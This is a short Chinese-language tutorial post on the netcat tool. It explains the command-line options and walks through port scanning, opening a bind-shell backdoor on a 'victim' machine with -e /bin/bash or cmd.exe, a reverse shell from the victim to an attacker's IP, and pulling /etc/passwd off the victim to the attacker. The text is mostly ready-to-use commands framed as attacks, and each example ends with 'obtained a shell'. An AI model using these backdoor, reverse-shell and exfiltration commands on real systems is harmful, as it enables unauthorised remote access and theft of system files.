nc工具學習
阿新 • • 發佈:2018-08-05
color 時間 遠程 基本 學習 源地址 綁定 指定 col
0x00、命令詳解
基本使用
想要連接到某處:nc [-options] ip port
綁定端口等待連接:nc -l -p port ip
參數:
-e prog 程序重定向,一旦連接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h 幫助信息
-i secs 延時的間隔
-l 監聽模式,用於入站連接
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 任意指定本地及遠程端口
-s addr 本地源地址
-u UDP模式
-v 詳細輸出——用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉——用於掃描時
0x01、常用的用法
1、端口掃描:
nc -vv ip port 例:nc -vv 192.168.1.1 5000 掃描192.168.1.1的tcp 5000端口 nc -vv -w secs ip port-port 例:nc -vv -w 5 192.168.1.1 5000-5002 掃描192.168.1.1的5000-5002端口,網絡超時的時間設為5秒。
2、開設後門:
受害機: nc -l -p port -e cmd.exe //windows nc -l -p port -e /bin/bash //linux 攻擊機 nc ip port
例:受害機IP:192.168.190.129、攻擊機IP:192.168.190.130
受害機先開啟後門,等待連接
攻擊機進行連接
成功獲得shell
3、反向連接
受害機: nc -e cmd.exe ip port //windows nc -e /bin/bash ip port //linux 攻擊機: nc -vv -l -p port
例:受害機IP:192.168.190.129、攻擊機IP:192.168.190.130
攻擊機先開啟一個監聽端口,等待受害機反向連接過來
受害機反向連接攻擊機
成功獲取shell
4、傳輸文件
從受害機上拉文件下來 受害機: nc attack_ip port < /etc/passwd 攻擊機: nc-l -p port > tmp 從攻擊機上下載文件: 攻擊機: nc -l -p port < tmp 受害機: nc attack_ip port > tmp
nc工具學習